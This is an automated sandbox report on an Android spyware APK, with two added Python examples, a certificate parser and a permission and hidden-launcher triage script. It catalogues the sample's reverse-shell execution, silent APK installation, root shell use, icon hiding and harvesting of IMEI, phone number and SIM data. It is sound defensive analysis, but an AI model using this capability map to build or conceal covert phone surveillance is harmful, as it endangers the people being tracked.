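The method string above starts with 30 82 04 a8 30 82 03 90 a0 03 02 01 02, which is the opening of a DER-encoded X.509 certificate stored as a byte array. The class name suggests the certificate table that Google Play Services ships to verify its own packages' signers, but that is an assumption; the report only shows the bytes. The following Python is an added example, not code from the report or from the analysed app: it transcribes the escaped bytes the report prints and walks the DER structure far enough to recover the outer length, version, serial number, signature algorithm OID and the first issuer RDN, stopping cleanly where the report truncates the string. Function and constant names are this example's own.

```python
# Added example: walk the DER prefix of the certificate bytes printed in the
# "Found very long method strings" signature above. Not code from the report
# or from the analysed sample; names are this example's own.

# Transcribed from the report's escaped method string. Every \uXXXX escape is
# a single byte, so latin-1 encoding reproduces the raw DER. The report
# truncates the string, so the parser below must tolerate running out of data.
ESCAPED = (
    "0\u0082\u0004\u00a80\u0082\u0003\u0090\u00a0\u0003\u0002\u0001\u0002"
    "\u0002\t\u0000\u00d5\u0085\u00b8l}\u00d3N\u00f5"
    "0\r\u0006\t*\u0086H\u0086\u00f7\r\u0001\u0001\u0004\u0005\u0000"
    "0\u0081\u00941\u000b0\t\u0006\u0003U\u0004\u0006\u0013\u0002US1\u00130\u0011"
)
DER_PREFIX = ESCAPED.encode("latin-1")

# OIDs this example knows how to name (RFC 3279 / RFC 4519); others print raw.
OID_NAMES = {
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "2.5.4.3": "commonName",
    "2.5.4.6": "countryName",
    "2.5.4.10": "organizationName",
}


def read_tlv(buf, pos):
    """Read one DER tag/length header; return (tag, length, value_start, value_end)."""
    if pos + 2 > len(buf):
        raise EOFError("truncated before a TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:                      # long form: low bits give the number of length bytes
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    return tag, length, pos, pos + length


def decode_oid(raw):
    """Decode OBJECT IDENTIFIER content bytes into dotted form."""
    arcs = [raw[0] // 40, raw[0] % 40]
    value = 0
    for byte in raw[1:]:
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:               # a clear high bit ends a base-128 arc
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)


def parse_certificate_prefix(der):
    """Parse Certificate -> tbsCertificate -> version, serial, signature, issuer, as far as the data allows."""
    info = {}
    _, length, pos, _ = read_tlv(der, 0)              # Certificate ::= SEQUENCE
    info["certificate_len"] = length
    _, length, pos, _ = read_tlv(der, pos)            # tbsCertificate ::= SEQUENCE
    info["tbs_len"] = length
    tag, _, pos, nxt = read_tlv(der, pos)             # [0] EXPLICIT Version
    if tag != 0xA0:
        raise ValueError("expected explicit version tag")
    _, _, vpos, _ = read_tlv(der, pos)                # INTEGER; v3 is encoded as 2
    info["version"] = der[vpos] + 1
    _, _, pos, nxt = read_tlv(der, nxt)               # serialNumber INTEGER
    info["serial_hex"] = der[pos:nxt].hex()
    _, _, pos, nxt = read_tlv(der, nxt)               # signature AlgorithmIdentifier SEQUENCE
    _, _, opos, oend = read_tlv(der, pos)             # its OBJECT IDENTIFIER
    info["sig_alg_oid"] = decode_oid(der[opos:oend])
    info["sig_alg_name"] = OID_NAMES.get(info["sig_alg_oid"], "unknown")
    _, length, pos, end = read_tlv(der, nxt)          # issuer Name ::= SEQUENCE OF RDN
    info["issuer_len"] = length
    rdns = []
    while pos < min(end, len(der)):
        try:
            _, _, spos, send = read_tlv(der, pos)     # RelativeDistinguishedName ::= SET
            if send > len(der):
                break                                 # the report cut the string here
            _, _, apos, _ = read_tlv(der, spos)       # AttributeTypeAndValue ::= SEQUENCE
            _, _, opos, oend = read_tlv(der, apos)    # attribute type OID
            _, _, vpos, vend = read_tlv(der, oend)    # attribute value string
        except EOFError:
            break
        attr = decode_oid(der[opos:oend])
        rdns.append((OID_NAMES.get(attr, attr), der[vpos:vend].decode("ascii", "replace")))
        pos = send
    info["issuer_rdns"] = rdns
    return info


if __name__ == "__main__":
    for key, value in parse_certificate_prefix(DER_PREFIX).items():
        print(f"{key}: {value}")
```

On the transcribed prefix this yields an outer Certificate length of 0x04a8 (1192 bytes), version 3, serial 00d585b86c7dd34ef5, signature algorithm 1.2.840.113549.1.1.4 (md5WithRSAEncryption) and an issuer that begins with C=US; the report's "Length: 4395" counts the method string as printed, not the certificate's DER length. An MD5-signed certificate is harmless when an app pins it byte-for-byte as a known signer, but the same bytes installed as a TLS trust anchor would be a finding in their own right.
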
Spreading:

Accesses external storage location
Source: com.sysmanager.system.AndroidSystemCall;->getAvailableExternalMemorySize:87 | API Call: android.os.Environment.getExternalStorageDirectory
Source: com.sysmanager.system.AndroidSystemCall;->getTotalExternalMemorySize:98 | API Call: android.os.Environment.getExternalStorageDirectory
Has permission to change the Wi-Fi configuration, including connecting and disconnecting
Source: submitted apk | Request permission: android.permission.CHANGE_WIFI_STATE

System Summary:

Classification label
Source: classification engine | Classification label: mal80.expl.spyw.troj.and@0/251@3/0
Creates SQLiteDatabase table
Source: com.sysmanager.storage.FileSend;->onCreate:399 | API Call: android.database.sqlite.SQLiteDatabase.execSQL
Source: com.sysmanager.storage.Settings;->onCreate:36 | API Call: android.database.sqlite.SQLiteDatabase.execSQL
Reads shared settings (SharedPreferences)
Source: com.google.firebase.iid.zzh;->zzu:160 | API Call: "|T|108944492905|*": null
Source: com.google.firebase.iid.zzh;->zzeI:93 | API Call: "|S||P|": null
Source: com.google.firebase.iid.zzh;->zzeI:97 | API Call: "|S||K|": null
Source: com.google.android.gms.ads.identifier.AdvertisingIdClient;->getAdvertisingIdInfo:10 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.iid.zze;->zzabS:7 | API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.iid.zze;->zzjt:16 | API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.iid.zze;->zzjx:41 | API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.iid.zzh;->zzjy:135 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.flags.impl.zza$zza$1;->zzbX:7 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.flags.impl.zza$zzd$1;->zzbY:6 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.auth.api.signin.internal.zzn;->zzcB:55 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzaua$zza;->zzMp:6 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzaua$zzc;->zzqm:77 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzaua;->zzMk:75 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzaua;->zzMm:87 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzaua;->zzMo:106 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzaua;->zzaL:130 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzaua;->zzmS:181 | API Call: android.content.SharedPreferences.getBoolean
Executes native commands
Source: com.sysmanager.network.InstallApk;->installApp:33 | API Call: java.lang.Runtime.exec
Source: com.sysmanager.network.StartReverse;->execReverse:33 | API Call: java.lang.Runtime.exec
Source: com.sysmanager.utils.Commands;->executeCommands:5 | API Call: java.lang.Runtime.exec
Source: eu.chainfire.libsuperuser.Shell$Interactive;->open:69 | API Call: java.lang.Runtime.exec
Source: eu.chainfire.libsuperuser.Shell$Interactive;->open:122 | API Call: java.lang.Runtime.exec
Source: eu.chainfire.libsuperuser.Shell;->run:49 | API Call: java.lang.Runtime.exec
Requests permissions granted only to platform-signed APKs or APKs within the system image
Source: submitted apk | Request permission: android.permission.INSTALL_PACKAGES
Requests potentially dangerous permissions
Source: submitted apk | Request permission: android.permission.ACCESS_COARSE_LOCATION
Source: submitted apk | Request permission: android.permission.ACCESS_FINE_LOCATION
Source: submitted apk | Request permission: android.permission.CAMERA
Source: submitted apk | Request permission: android.permission.CHANGE_NETWORK_STATE
Source: submitted apk | Request permission: android.permission.CHANGE_WIFI_STATE
Source: submitted apk | Request permission: android.permission.GET_TASKS
Source: submitted apk | Request permission: android.permission.INTERNET
Source: submitted apk | Request permission: android.permission.PROCESS_OUTGOING_CALLS
Source: submitted apk | Request permission: android.permission.READ_CONTACTS
Source: submitted apk | Request permission: android.permission.READ_PHONE_STATE
Source: submitted apk | Request permission: android.permission.READ_SMS
Source: submitted apk | Request permission: android.permission.RECEIVE_SMS
Source: submitted apk | Request permission: android.permission.RECORD_AUDIO
Source: submitted apk | Request permission: android.permission.WAKE_LOCK
Source: submitted apk | Request permission: android.permission.WRITE_EXTERNAL_STORAGE
Source: submitted apk | Request permission: com.android.browser.permission.READ_HISTORY_BOOKMARKS
Tries to change file permissions on the native system using chmod
Source: com.sysmanager.network.StartReverse;->doInBackground:92 | API Call: java.io.File.<init>

Malware Analysis System Evasion:

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: classes.dex | Binary or memory string: Ljava/lang/VirtualMachineError; (this is the standard java.lang.VirtualMachineError class name, so on its own it is weak evidence of sandbox detection)
Accesses /proc
Source: Lcom/google/android/gms/common/util/zzu;->zzdq(I)Ljava/lang/String; | Method string: "/proc/"
Accesses Android OS build fields
Source: com.sysmanager.network.HTTPUtility;->doFileUpload:95 | Field Access: android.os.Build.MODEL
Source: com.sysmanager.network.HTTPUtility;->requestAESKeyToServer:304 | Field Access: android.os.Build.MODEL
Source: com.sysmanager.network.HTTPUtility;->sendStringEncrypted:397 | Field Access: android.os.Build.MODEL
Source: com.sysmanager.network.StartReverse;-><clinit>:12 | Field Access: android.os.Build.CPU_ABI
Source: com.sysmanager.system.AndroidSystemCall;->androidInfo:188 | Field Access: android.os.Build$VERSION.RELEASE
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:369 | Field Access: android.os.Build.MODEL
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:413 | Field Access: android.os.Build.MODEL
Source: com.sysmanager.system.AudioController;->foregroundApp:48 | Field Access: android.os.Build.BRAND
Source: com.sysmanager.system.RegistrationService;->getRegJson:67 | Field Access: android.os.Build.MODEL
Source: com.google.android.gms.internal.zzatl;->zzLS:23 | Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzatl;->zzkN:38 | Field Access: android.os.Build.MODEL
Source: com.google.android.gms.common.util.zzj;->zzzd:39 | Field Access: android.os.Build.TYPE
Queries several pieces of sensitive phone information
Source: Lcom/google/android/gms/internal/zzaue;->zza(Lcom/google/android/gms/internal/zzatq;Ljava/lang/String;)[B | Method string: "android"
Source: Lcom/sysmanager/system/AndroidSystemCall;->phoneInfo()V | Method string: "imei"
Source: Lcom/google/android/gms/internal/zzai;-><clinit>()V | Method string: "category"
Source: Lcom/google/android/gms/internal/zzatv;->zzlD(I)Ljava/util/List; | Method string: "type"
Source: Lcom/google/android/gms/internal/zzah;-><clinit>()V | Method string: "time"
Source: Lcom/sysmanager/system/RegistrationService;->getRegJson(Ljava/lang/String;)Lorg/json/JSONObject; | Method string: "phone"
Source: Lcom/google/firebase/iid/zzf;->zza(Landroid/os/Bundle;Ljava/security/KeyPair;Ljava/lang/String;)V | Method string: "appid"
Queries the unique operating system ID (ANDROID_ID)
Source: com.google.android.gms.internal.zzaue;->zza:1166 | API Call: android.provider.Settings$Secure.getString

Hooking and other Techniques for Hiding and Protection:

Uses Crypto APIs
Source: com.google.firebase.iid.FirebaseInstanceId;->zza:46 | API Call: java.security.MessageDigest.getInstance
Source: com.google.firebase.iid.zzf;->zza:220 | API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.zzf;->zza:220 | API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.zzf;->zza:220 | API Call: java.security.MessageDigest.digest
Source: com.sysmanager.costanti.Costanti;->computeMD5Hash:11 | API Call: java.security.MessageDigest.getInstance
Source: com.sysmanager.costanti.Costanti;->computeMD5Hash:13 | API Call: java.security.MessageDigest.update
Source: com.sysmanager.costanti.Costanti;->computeMD5Hash:14 | API Call: java.security.MessageDigest.digest
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCrypto:11 | API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCrypto:14 | API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCrypto:18 | API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoString:30 | API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoString:33 | API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoString:35 | API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoStringServerCom:45 | API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoStringServerCom:48 | API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.CryptoUtils;->doCryptoStringServerCom:50 | API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoString:60 | API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoString:63 | API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoString:64 | API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoStringServerCom:74 | API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoStringServerCom:77 | API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.CryptoUtils;->doDecryptoStringServerCom:78 | API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaDecrypt:15 | API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaDecrypt:16 | API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaDecrypt:17 | API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaEncrypt:22 | API Call: javax.crypto.Cipher.getInstance
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaEncrypt:23 | API Call: javax.crypto.Cipher.init
Source: com.sysmanager.cryptoutils.RSAUtils;->rsaEncrypt:24 | API Call: javax.crypto.Cipher.doFinal
Source: com.sysmanager.network.HTTPUtility;->getHash256OfFile:214 | API Call: java.security.MessageDigest.getInstance
Source: com.sysmanager.network.HTTPUtility;->getHash256OfFile:216 | API Call: java.security.MessageDigest.update
Source: com.sysmanager.network.HTTPUtility;->getHash256OfFile:219 | API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.FirebaseInstanceId;->zza:47 | API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzaua;->zzfH:164 | API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzaut;->zzch:382 | API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzaut;->zzL:449 | API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzaut;->zzz:963 | API Call: java.security.MessageDigest.digest
Source: okio.Buffer;->digest:2 | API Call: java.security.MessageDigest.getInstance
Source: okio.Buffer;->digest:9 | API Call: java.security.MessageDigest.update
Source: okio.Buffer;->digest:14 | API Call: java.security.MessageDigest.update
Source: okio.Buffer;->digest:16 | API Call: java.security.MessageDigest.digest
Source: okio.ByteString;->digest:33 | API Call: java.security.MessageDigest.getInstance
Source: okio.ByteString;->digest:35 | API Call: java.security.MessageDigest.digest
Source: okio.HashingSink;-><init>:2 | API Call: java.security.MessageDigest.getInstance
Source: okio.HashingSink;->hash:24 | API Call: java.security.MessageDigest.digest
Source: okio.HashingSink;->write:34 | API Call: java.security.MessageDigest.update
Source: okio.HashingSource;-><init>:2 | API Call: java.security.MessageDigest.getInstance
Source: okio.HashingSource;->hash:24 | API Call: java.security.MessageDigest.digest
Source: okio.HashingSource;->read:34 | API Call: java.security.MessageDigest.update
Has permission to query the list of currently running applications
Source: submitted apk | Request permission: android.permission.GET_TASKS
Has permissions to monitor, redirect and/or block calls
Source: submitted apk | Request permission: android.permission.PROCESS_OUTGOING_CALLS
Queries list of running processes/tasks
Source: com.sysmanager.system.AudioController;->foregroundApp:94 | API Call: android.app.ActivityManager.getRunningTasks
Source: com.google.firebase.messaging.zza;->zzaca:154 | API Call: android.app.ActivityManager.getRunningAppProcesses
Removes its application launcher (likely to stay hidden)
Source: com.sysmanager.Main;->onCreate:16 | API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Source: com.sysmanager.MainWeb;->onCreate:16 | API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Source: com.sysmanager.OnBootReceiver;->onReceive:80 | API Call: android.content.pm.PackageManager.setComponentEnabledSetting

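The permission set listed under System Summary and the setComponentEnabledSetting calls listed here are the two findings a responder can confirm on a live device without the sample's source. The following Python is an added example, not code from the report or from the analysed app: it parses a constructed excerpt in the shape of adb shell dumpsys package output (package, permission and component names follow this report; the dumpsys layout and the launcher activity name are assumptions), buckets requested permissions into surveillance capabilities, flags INSTALL_PACKAGES as a signature|privileged permission that a sideloaded app can request but is never granted, and reports launcher activities the app disabled on itself. Function and constant names are this example's own.

```python
# Added example: triage a package from `adb shell dumpsys package <pkg>` output,
# combining its requested permissions with the components it disabled on itself.
# Not code from the report or the sample; names are this example's own, and the
# dumpsys excerpt below is constructed, not captured from the device.
import re

# Constructed excerpt. Package, permission and component names follow this
# report; the surrounding dumpsys formatting is an assumption.
DUMPSYS_SAMPLE = """\
Packages:
  Package [com.sysmanager] (3f2a1c9):
    userId=10087
    codePath=/data/app/com.sysmanager-1
    flags=[ HAS_CODE ALLOW_CLEAR_USER_DATA ALLOW_BACKUP ]
    requested permissions:
      android.permission.INSTALL_PACKAGES
      android.permission.READ_SMS
      android.permission.RECEIVE_SMS
      android.permission.READ_CONTACTS
      android.permission.READ_PHONE_STATE
      android.permission.PROCESS_OUTGOING_CALLS
      android.permission.RECORD_AUDIO
      android.permission.CAMERA
      android.permission.ACCESS_FINE_LOCATION
      android.permission.INTERNET
    User 0: ceDataInode=12345 installed=true hidden=false stopped=false enabled=0
      disabledComponents:
        com.sysmanager.Main
        com.sysmanager.MainWeb
"""

# Which requested permissions grant which surveillance capability.
CAPABILITIES = {
    "sms": {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"},
    "contacts": {"android.permission.READ_CONTACTS"},
    "telephony_ids": {"android.permission.READ_PHONE_STATE"},
    "call_control": {"android.permission.PROCESS_OUTGOING_CALLS"},
    "location": {"android.permission.ACCESS_FINE_LOCATION", "android.permission.ACCESS_COARSE_LOCATION"},
    "audio": {"android.permission.RECORD_AUDIO"},
    "camera": {"android.permission.CAMERA"},
    "network": {"android.permission.INTERNET"},
}
SURVEILLANCE = {"sms", "contacts", "telephony_ids", "call_control", "location", "audio", "camera"}
# protectionLevel signature|privileged: anyone may request it, only platform-signed
# or privileged system apps are granted it.
SIGNATURE_ONLY = {"android.permission.INSTALL_PACKAGES"}


def parse_dumpsys(text):
    """Split dumpsys output into per-package dicts: flags, requested permissions, disabled components."""
    packages, current, section = [], None, None
    for line in text.splitlines():
        m = re.match(r"\s+Package \[(\S+)\]", line)
        if m:
            current = {"package": m.group(1), "flags": set(), "permissions": set(), "disabled": set()}
            packages.append(current)
            section = None
            continue
        if current is None:
            continue
        stripped = line.strip()
        m = re.match(r"flags=\[(.*?)\]", stripped)
        if m:
            current["flags"] = set(m.group(1).split())
        elif stripped == "requested permissions:":
            section = "permissions"
        elif stripped == "disabledComponents:":
            section = "disabled"
        elif section and line.startswith("      ") and stripped and " " not in stripped:
            current[section].add(stripped)          # one indented item of the open list
        else:
            section = None                          # any other line closes the list
    return packages


def triage(text, launcher_activities=frozenset()):
    """Return per-package findings. launcher_activities: MAIN/LAUNCHER activities known from the manifest."""
    results = []
    for pkg in parse_dumpsys(text):
        caps = {name for name, perms in CAPABILITIES.items() if perms & pkg["permissions"]}
        findings = []
        unobtainable = sorted(pkg["permissions"] & SIGNATURE_ONLY)
        if unobtainable and "SYSTEM" not in pkg["flags"]:
            findings.append("requests signature-level permission(s) a sideloaded app is never granted: "
                            + ", ".join(unobtainable))
        launcher_disabled = sorted(pkg["disabled"] & set(launcher_activities))
        if launcher_disabled:
            findings.append("launcher activity disabled by the app itself (icon hidden): "
                            + ", ".join(launcher_disabled))
        spyware = len(caps & SURVEILLANCE) >= 4 and "network" in caps
        if spyware:
            findings.append("surveillance profile: " + ", ".join(sorted(caps & SURVEILLANCE))
                            + " plus network access")
        results.append({"package": pkg["package"], "capabilities": sorted(caps),
                        "launcher_disabled": launcher_disabled, "spyware_profile": spyware,
                        "findings": findings})
    return results


if __name__ == "__main__":
    # The launcher activity name is an assumption for the constructed sample; in a
    # real case take it from the manifest (aapt dump badging, launchable-activity).
    for r in triage(DUMPSYS_SAMPLE, launcher_activities={"com.sysmanager.Main"}):
        print(r["package"], r["capabilities"])
        for f in r["findings"]:
            print("  -", f)
```

The launcher set is passed in because dumpsys alone does not say which disabled component carried the MAIN/LAUNCHER intent filter. A package whose own launcher activity sits under disabledComponents while it holds this many surveillance permissions is the combination worth escalating, and INSTALL_PACKAGES in the request list tells you the Runtime.exec path is what the app relies on for installing anything.
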
Language, Device and Operating System Detection:

Queries the SIM provider ISO country code
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:399 | API Call: android.telephony.TelephonyManager.getSimCountryIso
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:419 | API Call: android.telephony.TelephonyManager.getSimCountryIso
Queries the SIM provider name (SPN, Service Provider Name)
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:394 | API Call: android.telephony.TelephonyManager.getSimOperatorName
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:418 | API Call: android.telephony.TelephonyManager.getSimOperatorName
Queries the SIM provider numeric MCC+MNC (mobile country code + mobile network code)
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:389 | API Call: android.telephony.TelephonyManager.getSimOperator
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:417 | API Call: android.telephony.TelephonyManager.getSimOperator
Queries the network operator ISO country code
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:374 | API Call: android.telephony.TelephonyManager.getNetworkCountryIso
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:414 | API Call: android.telephony.TelephonyManager.getNetworkCountryIso
Queries the network operator name
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:384 | API Call: android.telephony.TelephonyManager.getNetworkOperatorName
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:416 | API Call: android.telephony.TelephonyManager.getNetworkOperatorName
Queries the network operator numeric MCC+MNC (mobile country code + mobile network code)
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:379 | API Call: android.telephony.TelephonyManager.getNetworkOperator
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:415 | API Call: android.telephony.TelephonyManager.getNetworkOperator
Queries the unique device ID (IMEI, MEID or ESN), the SIM serial number and the phone number
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:359 | API Call: android.telephony.TelephonyManager.getLine1Number
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:364 | API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:404 | API Call: android.telephony.TelephonyManager.getSimSerialNumber
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:411 | API Call: android.telephony.TelephonyManager.getLine1Number
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:412 | API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.sysmanager.system.AndroidSystemCall;->phoneInfo:420 | API Call: android.telephony.TelephonyManager.getSimSerialNumber
Source: com.sysmanager.system.RegistrationService;->getRegJson:58 | API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.sysmanager.system.RegistrationService;->getRegJson:59 | API Call: android.telephony.TelephonyManager.getDeviceId

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot